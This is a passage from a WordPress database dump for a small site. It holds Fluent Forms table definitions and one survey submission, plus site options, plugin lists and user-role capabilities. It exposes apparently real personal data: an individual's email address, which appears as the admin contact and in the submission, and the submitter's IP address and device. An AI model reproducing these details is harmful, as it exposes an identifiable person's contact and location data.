Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"icon-user\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1559116201333\"},{\"index\":1,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"admin_field_label\":\"Email\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Email Address\",\"icon_class\":\"icon-envelope-o\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1559116203187\"},{\"index\":9,\"element\":\"input_checkbox\",\"attributes\":{\"type\":\"checkbox\",\"name\":\"checkbox\",\"value\":[]},\"settings\":{\"container_class\":\"\",\"label\":\"Which game you want to play?\",\"admin_field_label\":\"Which game you want to play?\",\"label_placement\":\"\",\"display_type\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"options\":{\"Football\":\"Football\",\"Cricket\":\"Cricket\",\"Hocky\":\"Hocky\"},\"editor_options\":{\"title\":\"Check Box\",\"icon_class\":\"icon-check-square-o\",\"template\":\"inputCheckbox\"},\"uniqElKey\":\"el_1559116572343\"},{\"index\":8,\"element\":\"input_radio\",\"attributes\":{\"type\":\"radio\",\"name\":\"input_radio_1\",\"value\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Time of the match?\",\"admin_field_label\":\"Time of the match?\",\"label_placement\":\"\",\"display_type\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"options\":{\"Morning\":\"Morning\",\"Afternoon\":\"Afternoon\",\"Any time\":\"Any time\"},\"editor_options\":{\"title\":\"Radio Button\",\"icon_class\":\"icon-dot-circle-o\",\"element\":\"input-radio\",\"template\":\"inputRadio\"},\"uniqElKey\":\"el_1559116394587\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"description\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"rows\":4,\"cols\":2},\"settings\":{\"container_class\":\"\",\"label\":\"Put your suggestion (optional)\",\"admin_field_label\":\"suggestions\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"icon-paragraph\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1559188488518\"}],\"submitButton\":{\"uniqElKey\":\"el_1559116097684\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"green\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#67C23A\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Your opinion\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'form',NULL,2,'2021-07-05 14:02:48','2021-07-05 14:02:48');
/*!40000 ALTER TABLE `wp_fluentform_forms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_logs`
--
DROP TABLE IF EXISTS `wp_fluentform_logs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_logs` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`parent_source_id` int(10) unsigned DEFAULT NULL,
`source_type` varchar(255) DEFAULT NULL,
`source_id` int(10) unsigned DEFAULT NULL,
`component` varchar(255) DEFAULT NULL,
`status` char(30) DEFAULT NULL,
`title` varchar(255) NOT NULL,
`description` longtext DEFAULT NULL,
`created_at` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_logs`
--
LOCK TABLES `wp_fluentform_logs` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_fluentform_logs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_submission_meta`
--
DROP TABLE IF EXISTS `wp_fluentform_submission_meta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_submission_meta` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`response_id` bigint(20) unsigned DEFAULT NULL,
`form_id` int(10) unsigned DEFAULT NULL,
`meta_key` varchar(45) DEFAULT NULL,
`value` longtext DEFAULT NULL,
`status` varchar(45) DEFAULT NULL,
`user_id` int(10) unsigned DEFAULT NULL,
`name` varchar(45) DEFAULT NULL,
`created_at` timestamp NULL DEFAULT NULL,
`updated_at` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_submission_meta`
--
LOCK TABLES `wp_fluentform_submission_meta` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_submission_meta` DISABLE KEYS */;
INSERT INTO `wp_fluentform_submission_meta` VALUES
(1,1,3,'_entry_uid_hash','48982133de42d2c636befc67a158cc26',NULL,NULL,NULL,'2021-07-05 14:04:20','2021-07-05 14:04:20'),
(2,1,3,'is_form_action_fired','yes',NULL,NULL,NULL,'2021-07-05 14:04:20','2021-07-05 14:04:20');
/*!40000 ALTER TABLE `wp_fluentform_submission_meta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_fluentform_submissions`
--
DROP TABLE IF EXISTS `wp_fluentform_submissions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fluentform_submissions` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`form_id` int(10) unsigned DEFAULT NULL,
`serial_number` int(10) unsigned DEFAULT NULL,
`response` longtext DEFAULT NULL,
`source_url` varchar(255) DEFAULT NULL,
`user_id` int(10) unsigned DEFAULT NULL,
`status` varchar(45) DEFAULT 'unread' COMMENT 'possible values: read, unread, trashed',
`is_favourite` tinyint(1) NOT NULL DEFAULT 0,
`browser` varchar(45) DEFAULT NULL,
`device` varchar(45) DEFAULT NULL,
`ip` varchar(45) DEFAULT NULL,
`city` varchar(45) DEFAULT NULL,
`country` varchar(45) DEFAULT NULL,
`payment_status` varchar(45) DEFAULT NULL,
`payment_method` varchar(45) DEFAULT NULL,
`payment_type` varchar(45) DEFAULT NULL,
`currency` varchar(45) DEFAULT NULL,
`payment_total` float DEFAULT NULL,
`total_paid` float DEFAULT NULL,
`created_at` timestamp NULL DEFAULT NULL,
`updated_at` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_fluentform_submissions`
--
LOCK TABLES `wp_fluentform_submissions` WRITE;
/*!40000 ALTER TABLE `wp_fluentform_submissions` DISABLE KEYS */;
INSERT INTO `wp_fluentform_submissions` VALUES
(1,3,1,'{\"__fluent_form_embded_post_id\":\"365\",\"_fluentform_3_fluentformnonce\":\"b8f6b4bd5b\",\"_wp_http_referer\":\"\\/blog\\/?fluent_forms_pages=1&design_mode=1&preview_id=3\",\"names\":{\"first_name\":\"m\"},\"email\":\"masoud.nikoofar@gmail.com\",\"checkbox\":[\"Hocky\"],\"input_radio_1\":\"Afternoon\",\"description\":\"kkkkkk\"}','http://ictbank.ir/blog/blog/?fluent_forms_pages=1&design_mode=1&preview_id=3',2,'unread',0,'Chrome','Apple','5.112.82.220',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-07-05 14:04:19','2021-07-05 14:04:19');
/*!40000 ALTER TABLE `wp_fluentform_submissions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=511524 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES
(1,'siteurl','http://ictbank.ir/blog','yes'),
(2,'home','http://ictbank.ir/blog','yes'),
(3,'blogname','ictbank.ir','yes'),
(4,'blogdescription','','yes'),
(5,'users_can_register','0','yes'),
(6,'admin_email','masoud.nikoofar@gmail.com','yes'),
(7,'start_of_week','6','yes'),
(8,'use_balanceTags','0','yes'),
(9,'use_smilies','1','yes'),
(10,'require_name_email','1','yes'),
(11,'comments_notify','1','yes'),
(12,'posts_per_rss','10','yes'),
(13,'rss_use_excerpt','1','yes'),
(14,'mailserver_url','mail.example.com','yes'),
(15,'mailserver_login','login@example.com','yes'),
(16,'mailserver_pass','password','yes'),
(17,'mailserver_port','110','yes'),
(18,'default_category','1','yes'),
(19,'default_comment_status','open','yes'),
(20,'default_ping_status','open','yes'),
(21,'default_pingback_flag','0','yes'),
(22,'posts_per_page','10','yes'),
(23,'date_format','Y-m-d','yes'),
(24,'time_format','H:i','yes'),
(25,'links_updated_date_format','F j, Y g:i a','yes'),
(26,'comment_moderation','0','yes'),
(27,'moderation_notify','1','yes'),
(28,'permalink_structure','/%postname%/','yes'),
(30,'hack_file','0','yes'),
(31,'blog_charset','UTF-8','yes'),
(32,'moderation_keys','','no'),
(33,'active_plugins','a:6:{i:0;s:59:\"disable-remove-google-fonts/disable-remove-google-fonts.php\";i:1;s:31:\"elementor-pro/elementor-pro.php\";i:2;s:23:\"elementor/elementor.php\";i:3;s:38:\"seo-by-rank-math-pro/rank-math-pro.php\";i:4;s:30:\"seo-by-rank-math/rank-math.php\";i:5;s:39:\"syntaxhighlighter/syntaxhighlighter.php\";}','yes'),
(34,'category_base','','yes'),
(35,'ping_sites','https://rpc.pingomatic.com/','yes'),
(36,'comment_max_links','2','yes'),
(37,'gmt_offset','0','yes'),
(38,'default_email_category','1','yes'),
(39,'recently_edited','a:5:{i:0;s:105:\"/var/www/html/ictbank/blog/wp-content/plugins/disable-remove-google-fonts/disable-remove-google-fonts.php\";i:1;s:64:\"/var/www/html/ictbank/blog_new/wp-content/themes/phlox/style.css\";i:2;s:69:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/elementor.php\";i:3;s:65:\"/var/www/html/ictbank/blog/wp-content/plugins/akismet/akismet.php\";i:4;s:65:\"/var/www/html/ictbank/blog/wp-content/themes/twentytwenty/404.php\";}','no'),
(40,'template','hello-elementor','yes'),
(41,'stylesheet','hello-elementor','yes'),
(44,'comment_registration','0','yes'),
(45,'html_type','text/html','yes'),
(46,'use_trackback','0','yes'),
(47,'default_role','subscriber','yes'),
(48,'db_version','60421','yes'),
(49,'uploads_use_yearmonth_folders','1','yes'),
(50,'upload_path','','yes'),
(51,'blog_public','1','yes'),
(52,'default_link_category','2','yes'),
(53,'show_on_front','page','yes'),
(54,'tag_base','','yes'),
(55,'show_avatars','1','yes'),
(56,'avatar_rating','G','yes'),
(57,'upload_url_path','','yes'),
(58,'thumbnail_size_w','150','yes'),
(59,'thumbnail_size_h','150','yes'),
(60,'thumbnail_crop','1','yes'),
(61,'medium_size_w','300','yes'),
(62,'medium_size_h','300','yes'),
(63,'avatar_default','mystery','yes'),
(64,'large_size_w','1024','yes'),
(65,'large_size_h','1024','yes'),
(66,'image_default_link_type','none','yes'),
(67,'image_default_size','','yes'),
(68,'image_default_align','','yes'),
(69,'close_comments_for_old_posts','0','yes'),
(70,'close_comments_days_old','14','yes'),
(71,'thread_comments','1','yes'),
(72,'thread_comments_depth','5','yes'),
(73,'page_comments','0','yes'),
(74,'comments_per_page','50','yes'),
(75,'default_comments_page','newest','yes'),
(76,'comment_order','asc','yes'),
(77,'sticky_posts','a:0:{}','yes'),
(78,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(79,'widget_text','a:3:{i:2;a:4:{s:5:\"title\";s:15:\"About This Site\";s:4:\"text\";s:85:\"This may be a good place to introduce yourself and your site or include some credits.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:3;a:4:{s:5:\"title\";s:7:\"Find Us\";s:4:\"text\";s:168:\"<strong>Address</strong>\n123 Main Street\nNew York, NY 10001\n\n<strong>Hours</strong>\nMonday—Friday: 9:00AM–5:00PM\nSaturday & Sunday: 11:00AM–3:00PM\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),
(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),
(81,'uninstall_plugins','a:7:{s:28:\"malcare-security/malcare.php\";a:2:{i:0;s:10:\"MCWPAction\";i:1;s:9:\"uninstall\";}s:25:\"sucuri-scanner/sucuri.php\";s:19:\"sucuriscanUninstall\";s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:49:\"bbb-administration-panel/bigbluebutton-plugin.php\";s:25:\"bbb_admin_panel_uninstall\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";a:2:{i:0;s:15:\"AIO_WP_Security\";i:1;s:17:\"uninstall_handler\";}s:24:\"wordpress-seo/wp-seo.php\";s:14:\"__return_false\";}','no'),
(82,'timezone_string','','yes'),
(83,'page_for_posts','0','yes'),
(84,'page_on_front','647','yes'),
(85,'default_post_format','0','yes'),
(86,'link_manager_enabled','0','yes'),
(87,'finished_splitting_shared_terms','1','yes'),
(88,'site_icon','786','yes'),
(89,'medium_large_size_w','768','yes'),
(90,'medium_large_size_h','768','yes'),
(91,'wp_page_for_privacy_policy','3','yes'),
(92,'show_comments_cookies_opt_in','1','yes'),
(93,'admin_email_lifespan','1770891874','yes'),
(94,'initial_db_version','45805','yes'),
(95,'wp_user_roles','a:9:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:14:\"edit_portfolio\";b:1;s:14:\"read_portfolio\";b:1;s:16:\"delete_portfolio\";b:1;s:15:\"edit_portfolios\";b:1;s:22:\"edit_others_portfolios\";b:1;s:18:\"publish_portfolios\";b:1;s:23:\"read_private_portfolios\";b:1;s:17:\"delete_portfolios\";b:1;s:25:\"delete_private_portfolios\";b:1;s:27:\"delete_published_portfolios\";b:1;s:24:\"delete_others_portfolios\";b:1;s:23:\"edit_private_portfolios\";b:1;s:25:\"edit_published_portfolios\";b:1;s:22:\"manage_portfolio_terms\";b:1;s:20:\"edit_portfolio_terms\";b:1;s:22:\"delete_portfolio_terms\";b:1;s:22:\"assign_portfolio_terms\";b:1;s:22:\"fluentform_full_access\";b:1;s:27:\"fluentform_settings_manager\";b:1;s:27:\"fluentform_dashboard_access\";b:1;s:24:\"fluentform_forms_manager\";b:1;s:25:\"fluentform_entries_viewer\";b:1;s:26:\"create_notes_elementor-pro\";b:1;s:24:\"edit_notes_elementor-pro\";b:1;s:26:\"delete_notes_elementor-pro\";b:1;s:24:\"read_notes_elementor-pro\";b:1;s:31:\"edit_others_notes_elementor-pro\";b:1;s:33:\"delete_others_notes_elementor-pro\";b:1;s:39:\"read_others_private_notes_elementor-pro\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"rank_math_edit_htaccess\";b:1;s:16:\"rank_math_titles\";b:1;s:17:\"rank_math_general\";b:1;s:17:\"rank_math_sitemap\";b:1;s:21:\"rank_math_404_monitor\";b:1;s:22:\"rank_math_link_builder\";b:1;s:22:\"rank_math_redirections\";b:1;s:22:\"rank_math_role_manager\";b:1;s:19:\"rank_math_analytics\";b:1;s:23:\"rank_math_site_analysis\";b:1;s:25:\"rank_math_onpage_analysis\";b:1;s:24:\"rank_math_onpage_general\";b:1;s:25:\"rank_math_onpage_advanced\";b:1;s:24:\"rank_math_onpage_snippet\";b:1;s:23:\"rank_math_onpage_social\";b:1;s:20:\"rank_math_content_ai\";b:1;s:19:\"rank_math_admin_bar\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:58:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:14:\"edit_portfolio\";b:1;s:14:\"read_portfolio\";b:1;s:16:\"delete_portfolio\";b:1;s:15:\"edit_portfolios\";b:1;s:22:\"edit_others_portfolios\";b:1;s:18:\"publish_portfolios\";b:1;s:23:\"read_private_portfolios\";b:1;s:17:\"delete_portfolios\";b:1;s:25:\"delete_private_portfolios\";b:1;s:27:\"delete_published_portfolios\";b:1;s:24:\"delete_others_portfolios\";b:1;s:23:\"edit_private_portfolios\";b:1;s:25:\"edit_published_portfolios\";b:1;s:22:\"manage_portfolio_terms\";b:1;s:20:\"edit_portfolio_terms\";b:1;s:22:\"delete_portfolio_terms\";b:1;s:22:\"assign_portfolio_terms\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:23:\"rank_math_site_analysis\";b:1;s:25:\"rank_math_onpage_analysis\";b:1;s:24:\"rank_math_onpage_general\";b:1;s:24:\"rank_math_onpage_snippet\";b:1;s:23:\"rank_math_onpage_social\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:14:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:25:\"rank_math_onpage_analysis\";b:1;s:24:\"rank_math_onpage_general\";b:1;s:24:\"rank_math_onpage_snippet\";b:1;s:23:\"rank_math_onpage_social\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:8:\"customer\";a:2:{s:4:\"name\";s:8:\"Customer\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:12:\"shop_manager\";a:2:{s:4:\"name\";s:12:\"Shop manager\";s:12:\"capabilities\";a:92:{s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:17:\"edit_others_pages\";b:1;s:13:\"publish_posts\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_posts\";b:1;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:19:\"delete_others_pages\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:10:\"list_users\";b:1;s:18:\"edit_theme_options\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"